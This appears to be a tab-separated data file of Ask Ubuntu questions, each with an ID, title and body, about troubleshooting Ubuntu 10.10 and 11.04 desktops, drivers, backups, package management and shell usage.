40788	is it safe to upgrade ubuntu on dell vostro v130 ?	i just bought a dell vostro v130 notebook for my girlfriend , and i wanted to keep the preinstalled ubuntu , at least for a while ( and then , if needed , replace it with opensuse ) . but since the preinstalled version is 10.04 i wanted to at least install the current version . is it safe ? the notebook seems to be only certified for the preinstalled 10.04 version ( and nothing else ) . is there some hw blob that only exists in the preinstalled version that is preventing the normal ( and current ) version to work ?
40792	what 's the best way to report a kernel panic bug	suppose i have a machine that has no serial port and under certain reproducible situations will kernel panic . assume i have tested the mainline kernel from the kernel team ppa and know this is an 'upstream kernel ' issue . what information should i gather to file this as a kernel bug , and where should i file it , to get it noticed ?
40797	how do i get thunderbird localized ?	i am using natty and installed thunderbird as well as the locale-de package , but it is still in english . how can i change that ?
40798	classic mode missing desktop effects after updates	i formatted 10.10 and installed 11.04 today . my pc is kind of old so i 'm using ubuntu classic . first time i booted it worked really nice , with the shortkeys , snap-function and improved workspace switcher . but after installing some software and updates and rebooting , i am being forced to 'no effects'-mode ( without any warning or notice ) . i have no clue why , and afaik i 've installed nothing gnome/appearance-related . i did try rm -rf .gnome .gnome2 .gconf .gconfd .metacity to reset all gnome-settings , but that did n't help . does anyone know how to fix this ?
40801	add line numbers to gnu emacs	how can i add line numbers to emacs ? please explain , i 'm an absolute beginner .
40807	is there an offline dictionary ?	are there any off-line dictionaries available ?
40813	diff of two pdf files ?	i 'm looking for a good program to show me the differences between two similar pdf files . in particular , i 'm looking for something that does n't just run diff on an ascii version ( with `` pdftotext '' ) of the files . this is what pdfdiff.py does .
40817	how do i switch between desktops in compiz ?	after asking about the number of desktops , i was pointed to the compiz wiki which says : viewports and desktops are not the same concept . for technical reasons , changing the number of `` desktops '' or `` workspaces '' in environments such as gnome , kde , and xfce is not the same as changing the number of viewports in compiz . you can have multiple viewports on one desktop . i know how to use the shortcuts in desktop wall to switch between viewports on a single desktop . how do i switch between desktops ?
40818	unity launcher artifacts after suspend ( nvidia )	using ubuntu 11.04 on a macbookpro6,2 the nvidia driver and suspend and resume all work correctly out of the box . upon resume , however , the unity launcher shows visual artifacts . this occurs whether the screen lock is active upon resume or not . the launcher is set to 'dodge windows ' ( the default ) . no other application shows artifacts at any time ; the artifacts are restricted to the launcher . classic desktop shows no artifacts . i can not reproduce the issue on a different machine with ati ( fglrx ) drivers . the question is whether other nvidia users ( this is a gt216 [ geforce gt 330m ] rev a2 ) have this issue with the launcher ( macbook or otherwise ) and whether it should be filed as bug against unity . ( i noticed that ubuntu-bug is trying to reduce the bug reports against unity ; so , i 'm starting here ) .
40819	pulse audio not sending sound to speakers	i 've been wrestling with this problem for two days . since upgrading from 10.10 to 11.04 , i can no longer get multichannel ( 5.1 ) sound to my speakers . stereo 2-channel sound was working , but it was using the onboard sound system . i want 5.1 surround sound using my soundblaster audigy2 card . i have now disabled the onboard sound in my pc 's bios . now , alsa is using the audigy card . pulse audio is using the audigy 5.1 as both source and sink . this is verified by monitoring them in padevchooser when a sound is being played . however , no sound is going to the speakers , which are wired into the three output jacks of the audigy2 card . all of this worked just fine on ubuntu 10.10 . tim
40820	how can i get a set of files into the zeitgeist index for dash access ?	i understand , based on a number of other sources , that files will not appear in a dash search until they have been opened , due to the search drawing from zeitgeist . as an example , this is frustrating if i am watching a season of a tv series , and i 'd like to be able to get to the next episode via dash searching the show title . the obvious , clunky workaround is to open each file once by hand to force them into the index . i 'd like to write a script that will do this for me for the contents of a directory . does anyone have advice on writing a nautilus script that will open each file in a directory with high efficiency , ensuring that the files make it into the zeitgeist index ? thoughts : it would be nice to have a small dummy application that functions as a data provider to zeitgeist , but does nothing but `` open '' the files of specified formats passed to it . this would eliminate the need to open a heavier app like a video/music player or a word processor . i intend to look into this as ( hopefully ) elementary programming/scripting practice , and i would love tips/ideas if others are interested .
40821	picasa icon disappeared in unity launcher	i managed to put picasa into the launcher by dragging it from /usr/share/applications . everything is ok , except the icon : i can not have an icon on it . when dragging the application , it keeps its icon just until i lay it down on the launcher . the icon disappears as soon as the app is anchored .
40823	how can i bring gnome sticky note back in unity ?	if i 'm right , panel applet is no longer supported in unity . how can i bring sticky notes back ? is there any application or appindicator that has the same functionality ( like show all notes when logged in ) ? not tomboy please : ) , i do n't like its interface . thanks
40826	how do i get rid of the bitstream vera font in google chrome ?	i installed google chrome from the google download page . i went to chrome : //settings/fonts , and i changed the default font to ubuntu , but that only changed some websites . chrome still uses bitstream vera for a lot of websites , despite the fact that i changed the default font to ubuntu . how do i completely change the font to ubuntu ? am i missing something ?
40827	firefox 4 crashing in vnc	on my desktop pc i 've been using kubuntu 10.04 for about a year . recently i 've updated firefox to version 4 using aptitude and the mozilla-team/firefox-stable repository . since then , i ca n't run it when i 'm logged in through a vnc session . firefox crashes immediately : when i try to run it from the console i get this error : # # # ! ! ! abort : x_shmputimage : badshmseg ( invalid shared segment parameter ) ; 3 requests ago : file /build/buildd/firefox-4.0.1+build1+nobinonly/build-tree/mozilla/toolkit/xre/nsx11errorhandler.cpp , line 203 # # # ! ! ! abort : x_shmputimage : badshmseg ( invalid shared segment parameter ) ; 3 requests ago : file /build/buildd/firefox-4.0.1+build1+nobinonly/build-tree/mozilla/toolkit/xre/nsx11errorhandler.cpp , line 203 firefox works fine when i run it directly from the pc . firefox 3.x worked fine also from a vnc session . i tried to turn off the hardware acceleration from the firefox preferences , but that does n't fix the problem . firefox -- sync , firefox -safe-mode and firefox -profilemanager also crash the same way . any idea how to troubleshoot this ? thanks . edit : additional info . i run vnc ( realvnc 4.1.1 ) from xinetd , this is the config i use : service xvnc { type = unlisted disable = no socket_type = stream protocol = tcp wait = yes user = root server = /usr/bin/xvnc4 server_args = -inetd :1 -desktop vnc5901 -query localhost -geometry 1160x675 -depth 16 -once -disconnectclients=0 -nevershared passwordfile=/path/to/vnc/password -render port = 5901 }
40832	is ubuntu-arm essentially the same as ubuntu ?	i assume , the major difference is that it , and its included software , can run on arm , whereas ordinary ubuntu ca n't ? are there any other differences ? does ubuntu arm only run unity 2d ? are 3d effects still supported ? can ubuntu arm be networked ? can it be networked along with other ubuntu ( non-arm ) computers ? is this process the same , at least essentially , as with ordinary ubuntu ?
40836	how do i prevent duplicity from looking at every file in parent folders ?	when running the next command , i get errors about accessing certain files or directories ( like /root ) for which duplicity does not have sufficient permissions : duplicity -- dry-run -- include= '' /home/user '' -- include= '' /other/dir '' \ -- exclude='/ ' / file : ///tmp/backup-test/ i started wondering why this happens and ran a strace to see which files are accessed : strace -o /tmp/duplicity-traced -e trace=file ! ! to my surprise , every file in the directory / and /home are accessed through stat ( ) . this does not look good , performance-wise . is duplicity just not optimized for this query or am i missing something ?
40841	google services launcher icon	i have added a custom launcher for common services like gmail etc in unity . google services launcher where can i get the google services icon ? in another theme ? i 'm using default for 11.04 .
40842	how can i automatically set my status to busy when empathy starts ?	so i can make empathy log me in on boot , but how do i make my initial status busy ?
40844	indicators do not accept mouse clicks	since today the unity systray icons for network , audio and messaging do not react on mouse clicks . only data , me-menu and system-menu do react . when i open of them and move the mouse to the non-reacting icons they open . how can i fix or reset the unity panel ( indicator area ) ?
40847	title bar and decorations missing : unity desktop	uname -a : linux splitter 2.6.38-8-server # 42-ubuntu smp mon apr 11 03:49:04 utc 2011 x86_64 x86_64 x86_64 gnu/linux all of the windows on my desktop are missing a title bar and the decorations to maximize/minimize and close the window . i can reposition a window only by holding down the left alt key while doing a left mouse click and drag . i can maximize/minimize a window only by using ctl-alt-keypad-5 . i can close a window only by using a quit menu entry or by using the desktop toolbar on the left side . i suspect that i accidentally hit some sort of weird key combination and set a sticky preference of some sort , but i ca n't for the life of me find out where to reset it . any thoughts or suggestions ?
40849	kwin answer to compiz put and grid ?	i have just recently switched from ubuntu to kubuntu . ui-wise i prefer kde over unity , i do however miss some of the compiz plugins ( especially the keyboard shortcuts ) . kwin seems to allow enormous amounts of keyboard shortcuts , but so far i have n't been able to find the correct ones . what i specifically miss is the put/grid plugins in compiz that allowed placing and resizing of windows using different key combos plus the keypad . the closest i have come in kwin is the `` pack window '' and `` pack grow window '' key shortcuts that behave roughly like the put/grig plugins except it lacks the finegrained control . so in short : is there any way to get kwin key shortcuts to give the same finegrained control over size and placing of windows as compiz put/grid ( which had one place for each keypad key plus different sizes ) ?
40850	how can i become the owner of a file/folder that root owns ?	i had a bad habit of storing my wallpapers in /usr/share/backgrounds , and decided to move them all into pictures . well , the problem is that most of them are now read-only since they are owned by root . how can i become the owner of them , if root already owns them ? i have already tried how can i become the owner of a file that origins from another pc / user ? , but the settings do not `` stick '' .
40853	how can i save my desktop session ?	i like to have a set of open applications re-open when i log back into the system . i used to be able to save the currently open apps via the startup-applications preference dialog , but the `` save '' tab does n't appear to be in the unity desktop . is there a way that i can open a bunch of stuff on different
40861	apache2 restore files	how to restore all apache2 files , i mean i want to set the files to be like the default ones for apache2 . how to do it ?
40862	wireless card can only connect to certain networks	i just did my first install of ubuntu 11.04 . i can connect to my neighbors ' unsecured wi-fi networks , but not my own ( secured ) wi-fi network . i have a ralink rt2070 ( the cheapest wireless thingy i could find on newegg ) . it came with drivers that seem to only work in fedora , windows 7 , and on a mac ; however i did not need these drivers with windows 7 .
40863	upper half of laptop screen becomes black when i plug in an external lcd	my laptop has intel mobile gm965/gl960 integrated graphic controller and the screen size is 1280x800 . when i plug another lcd ( thinkvision 22 '' ) the upper half of the laptop screen becomes black . i can see : - the top panel ( on both monitors ) - the bottom size of the laptop screen with all windows and stuff - the mouse cursor when it goes over the upper black half of the laptop screen and everywhere on the second screen i can not see : - anything else ( except for the mouse cursor ) in the upper half of the laptop screen - anything ( except for the top panel and mouse cursor ) on the second screen i used ubuntu 10.10 before with the same hardware and the same two monitors -- everything worked fine . but now i ca n't use the other monitor . tried to search for a solution -- no luck . some additional observations : - if i change the resolution on the other screen to lower settings , then the black part shrinks vertically ( it is still there , though ) - after i unplug the second monitor , some windows shift , for example those extended to a half of screen etc . any links or ideas are very appreciated . thanks .
40864	can not download ubuntu netbook edition	windows 7 - acer i tried to download the netbook version today ( because i am on a netbook , of course ) and it told me that it could not download the torrent link . if i try downloading the desktop version , it works fine , and starts the download . solutions ? ( ( this is the wubi install ) )
40869	what command runs when i ssh into a server ?	when i ssh into a server , i see the motd then i am in bash . what command is running that takes care of displaying the motd and then starts the shell ?
40876	how do i get an atheros ar9287 working ?	i 'm running windows 7 normally on my acer laptop , and it works like a charm . however , whenever i boot up ubuntu , the network card does n't even seem to exist . i 've looked for hours for a solution , to no avail . these are some specs of the chip : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) what steps do i have to take to get some kind of network connection ? the networking was the one thing i liked about ubuntu , however , this is kind of a turn-off . i have tried running the `` additional drivers '' tool but it did not work .
40877	has anyone used mega squirrel 3.0	has anyone used mega squirrel ? i 'm not finding much about it on google and i do n't want to put in my premium account credentials . any better gui recommendations ?
40878	how can docky , awn , cairo dock and unity be compared ?	it would be very nice to see a comparison between features , icons and usability .
40881	what are the upstart events to monitor to attach/detach an ebs volume and an elastic ip at startup/shutdown ?	i 'm setting up an ubuntu instance on amazon ec2 and i 'm trying to configure it so that , at startup , it automatically attaches an ebs volume and takes an elastic ip address and , at shutdown , it automatically releases those resources . i found various init scripts that do what i want , but i 'd really like to use an upstart job , so that i can automatically install it through cloud-init . i understand from this exchange that the event i want to monitor to start my job is , for lucid and maverick start on stopped cloud-run-user-script and for natty start on stopped cloud-final is this really accurate ? also , what is the correct event to monitor to stop my job ( including unmounting and detaching the ebs volume and releasing the elastic ip ) ?
40882	nautilus elementary , no edit / preferences ?	i installed nautilus elementary 2.32.2.1from the ppa and i do n't have `` edit / preferences '' in nautilus . does anyone else have this issue ?
40883	does anybody know if it 's possible to make nested quicklists , or if that feature has been at least considered ?	for example , i have a launcher icon called google tools . when i right click it , it gives options to open google docs , gmail , calendar , etc . however i want to know if there 's any way to make the google docs portion extend further and show new document , new spreadsheet , etc . is this possible , or maybe planned ?
40884	how can i remove orphaned start menu entries ?	for some reason i have a bunch of left-over start menu entries from applications ( e.g , gnome do , synapse , leafpad . ) and was wondering if there 's a way to remove all orphaned entries for applications that are no longer installed ?
40887	what do i put in the `` search domains '' field ?	this one has always confused me . what do i put in this field ?
40888	my gnome-panel is misssing	in ubuntu classic , ubuntu classic ( no effects ) and safe mode the interface panel is missing in natty 11.04 , but it is normal in unity 3d . how do i solve this problem ? screen-shot of the problem .
40889	where is ubuntu oneâ´s u1 server located ?	i live in denmark and am exploring the option of using ubuntu and ubuntu one in the danish state schools . and in this context , i have looked a little into danish law on cloud servies and data security . and i would therefore like to know which countries ubuntu one 's u1 servers are located when i 'm accessing my ubuntu one data from denmark . and if they are located in multiple data centers/countries , which security methods are used to secure data transfer between them ?
40896	evolution < - > u1 : how can i solve problem with syncing ?	when i was trying to sync my evolution contacts with u1 i'got the following error message : '' gdbus.error : org.gtk.gdbus.unmappedgerror.quark._e_2ddata_2dbook_2derror.code100 : can not open book : could not create desktopcouchsession object '' . what does that mean and how can i solve this problem ? thanx in advance .
40902	how to create a folder with the following permission ?	i would like to create a non deletable directory , from where i can create and move files from another location to this directory with read and write access ?
40903	why does classic gnome desktop use unity-window-decorator ?	i 've only been booting into classic gnome desktop since 11.04 and since upgrading to 11.04 i 'm having horrible window flickering and what seems to almost be gdm restarting . maybe it 's not gdm restarting but what happens is the desktop will flicker , all windows from all workspaces will come to the current workspace , often all window decoration will be gone , artifacts , and super choppy window dragging . anyway , does unity-window-decorator have something to do with it ? is this compiz ? can i replace it with something else ? edit : i 'm pretty sure it has something to do with the buggy nvidia drivers . i know that the switch to unity-window-decorator is new between 10.10 and 11.04 so thought it may be an issue too . edit : for reference if it does have something to do with the drivers , i 'm using nvidia-current on - product : g92 [ geforce 9800 gtx+ ] vendor : nvidia corporation i run $ compiz -- replace & but that does n't fix it .
40904	teach a novice how to import a photo and upload it to ebay	is there an easier way to upload files in web browser ( html ) file upload forms other than noting/cutting a file location and typing/pasting that location into a browse ... dialog ? i 've heard drag and drop upload is on the way , but looks like ebay is n't using it yet . my dad was frustrated trying to import a photo off his digital camera and upload it to ebay . he had the import part figured out ( gnome/f-spot does a pretty good job with that ) , but was stuck because he did n't know how to browse to the photo . in my older f-spot ( on ubuntu 10.04 ) , when you right click on a photo there 's a `` copy photo location '' option . this copies the full path of the file into the clipboard , and i can easily use this for browser file upload forms . apparently this was changed in his newer f-spot ( on ubuntu 10.10 ) ... now it 's just `` copy photo '' . i do n't know what `` copy photo '' does , but it does n't put the full photo file path in the clipboard . i came up with a many-step process so he could do this on his own . anyone know a better way ? this is just crazy : import photo to f-spot . double-click on photo . copy/remember photo filename ( something like dscn0471.jpg ) . click `` places '' in the panel on the top of the desktop . choose `` search for files ... '' . paste or type in the filename next to `` name contains : '' . click `` find '' . if the file is found , note the folder listed ( if not , try searching again ) . you may leave the `` search for files '' window open . when visiting the site where you will upload the photo , you 'll be prompted to upload a file . the file upload `` form '' will include buttons such as `` browse ... '' and `` upload '' . first click `` browse ... '' . browse to the photo in the folder listed in step 8 . click `` open '' to choose that file . the window will close and you will return to the file upload form . click upload . done !
40908	gnome-themes-standard tries to overwrite a file from gnome-accessability-themes	i was trying to install gnome3 on my ubuntu but because of some reason , apt-get went into an invalid state after the installation ( which was incomplete i think ) . whenever i try any apt-get operation , i get an error : you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : gnome-shell : depends : gnome-themes-standard ( > = 2.91 ) but it is not installed e : unmet dependencies . try using -f. when i try sudo apt-get -f install i get : unpacking gnome-themes-standard ( from ... /gnome-themes-standard_3.0.0-2~natty1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/gnome-themes-standard_3.0.0-2~natty1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/themes/highcontrastinverse/index.theme ' , which is also in package gnome-accessibility-themes 3.0.0-0ubuntu1~build2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for gconf2 ... errors were encountered while processing : /var/cache/apt/archives/gnome-themes-standard_3.0.0-2~natty1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any way to fix this ?
40909	upgrade from 10.10 to 11.04 freezes at startup ; keyboard and mouse do n't work ; `` it seems that you do not have the hardware required to run unity ... ''	just after an upgrade from ubuntu 10.10 to 11.04 , ubuntu freezes at startup on a dialog saying : `` it seems that you do not have the hardware required to run unity . please choose ubuntu classic '' , etc . so far , i 've not been able to bring up any sort of ui , graphical or text , not even once . the mouse does n't work , nor does the keyboard . i ca n't click the `` close '' button . i ca n't switch either to another console or ui . i tried alt + print screen , r e and that did n't work either . rebooting leads me back to the same place . right now i would be delighted if i could just get the system back to what it was pre-upgrade ( which was just fine ) . does anyone have any idea what to do ? more : nothing on the keyboard works . i 'm still frozen at startup , with seemingly no way to intervene in the process . neither the mouse nor the keyboard seems to work -- the machine does n't respond to any keyboard input -- and there does n't appear to be any point in the process that i can get to an alternate ui ( i.e. , another shell , or `` recovery mode '' ) to issue commands that could possibly re-assign the window manager from unity back to what was there in 10.10 . this my first experience with ubuntu on a personal pc , and i 'm not familiar with `` booting into recovery mode '' . also , this is not a machine i want to just wipe clean and start over with . we 've been using it as my wife 's primary home pc and she 's got a lot of material on it she needs now and ca n't do without . i really want to get this fixed . the pc is an hp pavillion a450y , which uses the asus p4sd-la pes revision 0.01 motherboard . the video specs for this include `` integrated 3d graphics controller '' and `` in springdale chipset '' . the boot sequence does n't give me an opportunity to use `` recovery mode '' : when i turn on the machine and get past the bios screen , it flashes and goes directly to the frozen dialog box . it does not present me with any intervening screen where i can choose an alternate boot destination ( such as the `` recovery mode '' ) . ** so , is there some way to interrupt the boot sequence before it freezes ? is there another way to boot the system -- say , off of a cd , for example -- that will allow me to edit some of the config files mentioned above on the hard disk ? **
40912	how to set a folder inside an apache document to the correct permission ?	when i try to get to some apache2 folder it gives me you do n't have permission ... how to give the folder and the files full permission of usage ?
40913	how to hide sub-menu from applications menu remotely ?	how can i remove the games sub-menu from the applications menu remotely ? i do n't want to remove it completely , i just do n't want to show it in the applications menu . so that i can revert it back if i need it again . i want to remove it from more than 200 ubuntu pcs , that is why i would prefer a remote method for doing this task .
40918	how do i create a dynamic quicklist for the home folder ?	how can i create a dynamic quicklist for the home folder which adds all the bookmarks as quicklists ( i heard it is possible via libunity ) ?
40930	g++-4.3 not in repos anymore , how to install it ?	i 'm on ubuntu 11.04 and need g++-4.3 for a project . what is the best way to install it , since it is not present in the repositories anymore . do i have to build it from source or is there a better way ? using an older package of one older ubuntu release brings me in a dependency hell ...
40931	where are the unity launcher .desktop files ?	i 'd like to know which folder the unity launcher .desktop files are stored in , as they 're not anymore in /.gconf/desktop and i need to add a custom application to the launcher bar ( adding it in /usr/share/applications does n't seem to be enough ) . where are the unity launcher .desktop files ?
40939	how to edit .desktop files in unity-2d ?	the changes made for unity .desktop launchers does not take effect in unity 2d . which folder should i look into to make changes in unity-2d launcher icons ?
40945	shotwell : videos have wrong date	i 'm new to shotwell and imported my pictures . some of the videos ( apparently those i 've shot with my smartphone ) are now in a event dated to 1904 , jan 1st . i tried to edit the date , but the menu item ( photos- > adjust time and date ) is unavailable for videos . then i moved such a video into the correct event , but now the entire event is placed under 1904 and named `` fri jan 1 , 1904 - sat sep 11 , 2010 '' .
40947	how can i move all files in subdirectories recursively to a single directory ?	i am trying to collect all the files under the current directory and all the subdirectories to one directory . i am trying something like the following find -type f -exec mv { } collection/ { } \ ; the above command wo n't work because the second { } gives the full path , how can i collect all the files ?
40948	lastfm no longer free ?	lastfm used to allow listening without a subscription within rhythmbox ( and still does in ubuntu 10.10 ) , their website suggests this still ought to be the case ( at least for those of us in the uk , us or germany ) , but as of 11.04 it does n't work ootb ( neither with banshee or rythmbox ) . how can i get lastfm working again ( without a subscription ) ?
40956	proper way to restore user files/settings after an upgrade	i would like to install a fresh ubuntu 11.04 on my home computer that has a few user accounts i will need to restore . i currently use 'back in time ' to back up my data . i want to make sure everyone 's account is preserved with their data and settings and was wondering if these backups will suffice ? if i restore their folders into the new 'home ' folder on the fresh install , will this recreate their accounts and settings ? or is there a better way to accomplish this ?
40957	need a remote desktop to a headless server without logging in first	i 've been using linux for many years now but only to run servers . over the last few days i 've been struggling with a technical / configuration issue which i hope someone can help with . i 've installed / un-installed many packages but just ca n't figure out what the `` right '' way of doing this is . the requirement seems simple server runs ubuntu 10.04 with xubuntu and ssh ( i do not want to connect any screen , keyboard or mouse to the server ) i have windows 7 machine with putty on it and logging in to the server using ssh is fine i want to run an xterminal session on my windows machine . amongst the things i 've tried is vnu but i ca n't get it to work because i believe you have to login on the server first . thanks in advance
40959	how do i connect to tty/com ( /dev/ttyusb0 ) ?	just running ubuntu for the first time by booting to usb drive . now i have plugged in a usb-to-serial converter which has been recognized and automatically added as /dev/ttyusb0
40962	what file i need to edit to change the text color in a theme ?	after upgrading to ubuntu 11.04 ( from 10.10 ) with unity , and after i 've been messing around with the ( gtk , i guess ? ) theme a little , i 've encountered a little problem . in my panel ( the one with the systray ) all text are gray , the same goes on for all my right click menus and so on . after googleing i 've found out that i need to change the text [ normal ] ( or something like ) variable in my gtk theme . please correct me if i 'm wrong . i 've also found out that i need to edit a file in my theme /usr/share/themes/ < theme-name > but which file , and where in the file ? needs to be changed to black . ( can i use hex codes , ex . : # 000000 ? ) actually i see that the text in my right click menu is black when an option is disabled . i actually need to switch those two colors - in order to get everything right . correct ? thanks alot !
40964	i am searching for a theme i lost during a reinstall process	i am searching for several weeks for two themes i lost during a re installation of my ubuntu . unfortunately i had forgotten to backup this both themes . these themes was called `` radiance blue '' and `` radiance colder '' . they were great looking blue variants of the default radiance theme . i searched google from `` a to z '' , launchpad , deviantart , gnomelook.org and even omgubuntu and webupd8 . but i did n't found that themes . can everyone tell me the correct page/link where i can reinstall this themes from ?
40966	ubuntu one conflict removal	this question is regarding the `` ubuntu one '' cloud storage ! after syncing some folders from my desktop to the cloud , i wanted to remove one of these folders from the cloud storage . i tried to stop the syncing during this time , but this seems to be unreliable . the end result is that ubuntu one added an extension .u1conflict to all files and folders within the original folder on my desktop . is there a way to remove this .conflict extension ? all i want is the original desktop folder as it was .
40969	which options on adobe flash player do i choose so that i could watch videos on youtube ?	somehow youtube wrote that i must have a flash player to watch videos , and apparently i do n't ? the website that was suggested on youtube was : http : //get.adobe.com/flashplayer/ and i did n't know which option to choose from . i thought that ubuntu 9.04+ was the right one , but i am not so sure . my ubuntu is 11.04 . please help . lauren .
40973	problems with external monitors on my laptop	yesterday i got my new laptop and switched from mac os x to ubuntu . the graphics chip is an intel 3000 chipset of the new sandy bridge processors . now , i am having trouble with my external monitor , a dell ultrasharp connected via vga . ( at the moment ) the situation i want to have : monitor disconnected , laptop lid open : laptop screen monitor disconnected , laptop lid closed : suspend/hibernate monitor connected , laptop lid open : two screens side by side , of course with max . solution . the external monitor should be the main screen . monitor connected , laptop lid closed : external monitor as main monitor , laptop screen switched off . that used to work on my mac quite well ; when i closed the lid it hibernated , but i could wake it up by typing on the keyboard while the laptop was closed and the external monitor showed the picture . now , i have several problems with ubuntu . connecting the monitor while the laptop is running produces bad pictures , the monitor is flashing and i have to pull the cable . when the monitor is connected while booting , it works side-by-side unity : when i close the laptop , everything becomes black and does n't react anymore , even though in the system power settings i set the behaviour to `` blank screen '' . opening the laptop again , results in a black picture on both monitors , only the mouse arrow is visible . but still nothing reacts and i have to reboot the laptop manually . ubuntu classic : here , when i close the laptop , the external monitor shows the desktop , but in bad resolution . in the monitor settings , i recognize that the system thinks it is the laptop monitor . ( detect monitors ) after opening the laptop again , it becomes black just like when unity is running and i have to reboot . after some googeling , i feel like some other people have the same problems using natty . what could i do about it ?
40977	setting up nfs client shows `` local domain name not set '' error	i 'm having trouble configuring the machine to use nfs . i have installed autofs , and tried to configure it . but the problem is that the configuration i use on opensuse machines is n't working . first problem was a missing line in nsswitch.conf : i added the line : automount : nis files but now i get this : automount [ 2285 ] : lookup_init:136 : lookup ( yp ) : map auto.master : local domain name not set this is a local network setup , therefore i 'm completely confused by this error . why should nfs client require a domain name ?
40979	what is the path to the kernel headers so i can install vmware ?	i installed the vmware bundle on my ubuntu 11.04 successfully but when i open it it gives me this window and i do n't know the path to this c headers .
40980	can you move the ubuntu unity launch bar ?	i noticed a lot of questions regarding the unity launch bar and its location , the answers say it can not be moved , and probably will never be able to . i see the problem with the launcher in relation to the browser . when you approach the left of the screen , the launcher overlaps the upper left browser controls , thus the bottom of the screen would be more appropriate in this case . i downloaded compiz advanced settings tool , and under the unity plugin options , it looked as if you could move the launcher , but when i try to set it to the bottom , it refuses to go ... does anyone understand this situation ? ? ?
40983	an applet that reveal the path of an application by clicking on the window runned by this application ?	would such a thing exists , an applet that lets you click on the window and outputs the path of the application being runned by the window ? example , i click with the applet on a window where chromium browser is running and i get `` /usr/bin/chromium-browser '' ? thanks
40984	disable gnome-panel launcher ( alt+f2 )	i 'm running unity and a gnome-panel panel at the bottom at the same time . is there a way to disable the gnome-panel 's launcher ? at the moment , both unity 's and gnome-panel 's launcher pop up when i press alt+f2 . thanks in advance !
40985	how to connect to server as root in nautilus ?	i want to know how i can access the following as root : places > connect to server this is to connect to a server that needs a public key that i only have as root thanks
40986	how to switch between languages ?	i did n't like unity and installed gnome-shell on my ubuntu 11.04 and everything was alright . except that i ca n't switch my keyboard between languages ! how can i fix this ? what 's wrong ? i do n't have this problem in unity or classic ubuntu but in gnome-shell , it just does n't work .
40987	clicking on a folder in docky opens banshee not nautilus	somehow the action for opening folders has got confused . i think at some point i tried to open a folder with banshee , and now when i try to open a folder , it always ends up in banshee . this is from the `` places '' menu , and docky . i 'm not sure where to change this behaviour , and ca n't get the default behaviour back , without uninstalling banshee . any ideas.. ? e : after uninstalling and installing banshee again , the behaviour comes back , so there must be something editable somewhere that is causing this . ( maverick )
40991	how do i turn off the alt-shift-uparrow keybinding in gnome ?	after upgrading from 10.10 to 11.04 , the key sequence alt-shift-uparrow now seems to have a window-manager level definition . it seems that this is a new unity key sequence . however , i 'm using '' classic ubuntu '' on login - i.e . i 'm using gnome . nevertheless , this new key sequence has its unity functionality . i 'm an emacs user ( where meta=alt ) , and meta-shift-uparrow is a key sequence that i use fairly often ( manipulating tables in org-mode ) . so i 'd like to know how to turn off this unity/gnome keybinding , so that emacs actually sees this key sequence . as far as i can see , this keybinding ( alt-shift-uparrow ) is not mentioned in the gnome `` keyboard shortcuts '' tool ( available from the system- > preferences menu ) .
40992	what files and directories can be excluded from a backup of the home directory ?	duplicity does already a great job of making efficient backups , but i want still to minimize the amount of files being back-upped . what files or directories can be excluded in a home directory ? please name these explicitly , wildcards allowed , paths are relative to the home directory .
41000	how can i create a new kind of emblem ?	the emblems in nautilus do n't quite fit my needs . how can i add a new one , just for my user account ?
41001	how do i install bitcoin ?	can anyone walk me through the process of installing bitcoin on 11.04 ? i 'm new to linux , and this is really all i want to do with this computer . edit : perhaps this is too vague . i downloaded the tar.gz from the bitcoin website , and the 32 bit binary ( not sure if this is how you refer to it ) will not run . i tried installing the deb package , but i see no way to run the client even though it is supposedly installed according to the package manager . i hope this helps . here is the link to the tar.gz and this is the deb file i tried to install
41003	evolution does not ask for password with yahoo	yahoo will not send or receive mail . evolution never asks for a password . i will quit using yahoo after this but i would like to download my mail . thanks for any help . i think the problem is that all the services do not want to use pop so i need to tell it that it is a smtp server . is there any link that would help with setting up yahoo mail with evolution . b
41006	how to install squid-deb-proxy-client via preseed/early_command	using lucid , installing from the lucid mini.iso . both amd64 . in the following i 've tried as \ , all of apt-get , apt-install , anna-install , dpkg : d-i preseed/early_command string < cmd+opt > squid-deb-proxy-client i 've also tried : d-i preseed/early_command string /usr/bin/wget \ -o squid-deb-proxy-client_0.3.1_all.deb \ http : //ubuntu.media.mit.edu/ubuntu//pool/universe/s/squid-deb-proxy/squid-deb-proxy-client_0.3.1_all.deb & & dpkg -i squid-deb-proxy-client_0.3.1_all.deb is this possible , and if nor what is the earliest point one can get a installation to use the squid-deb-proxy server ?
41008	what does the dell-laptop kernel module do ?	i 'm upgrading the preinstalled version of ubuntu on the dell vostro v130 notebook . during the upgrade , there were some errors concerning the dell-laptop kernel module . what is this module , and what does it do ?
41009	is there an alternative to compiz ?	can i find a good replacement for compiz ? compiz in 11.04 with unity is laggy
41010	link clicked not passed to firefox	when firefox is set as my default browser , any links cliked in another application open a new blank firefox window , not a new tab or a new window with the page i want . is that a problem with the configuration of firefox , of `` preferred applications '' or what else ? the firefox executable script works fine , because doing firefox http : //example.com in a console window does the correct thing . is there a way i can edit the `` preferred applications '' manually ?
41013	how do i disable pathname expansion in bash ?	suppose i 'm a lazy bum and want to avoid putting every string in quotes when passing arguments to a function , how do i avoid the characters * and ? being used by bash for patname expansion ? simplified example : fn ( ) { echo `` $ 1 '' } # shopt -s option - disable * and ? fn not/*/expanded fn neither\ should\ this/be/expanded ? fn 'accepted too*' # shopt -u option - enable * and ? this should output : not/*/expanded neither should this/be/expanded ? accepted too*
41017	maven exits after trying to run it	i 've manually installed sun java 1.6.0_24 and apache maven 3.0.3 into ~/work on natty and when i run maven from my terminal it exits . i 've tried various other versions of maven ( 2.2.1 , 2.0.11 ) , previous versions of the jdk ( 1.6.0_23 ) without luck . i 've also tried logging in to tty1 and executing mvn from there the result being that my session is lost ( ie i 'm prompted with the host login ) . i am able to duplicate this behaviour with ant so my suspicion is that something is broken in the shell/terminal emulator .
41023	libreoffice page preview problem	when the menu bar is enabled for libreoffice , every time i click on the page preview , the program crash .
41025	avoid killing ssh in out-of-memory	when my server runs into out-of-memory , it usually kills several applications . is there any way how can i prevent from killing ssh . because usually , when this out-of-memory error happens , my ssh is broken like this : i connect to ssh server . enter username enter password and then i wait i wait and wait ... and waaaaaaaaaait.. and then : connection timed out . is there any way to prevent this ?
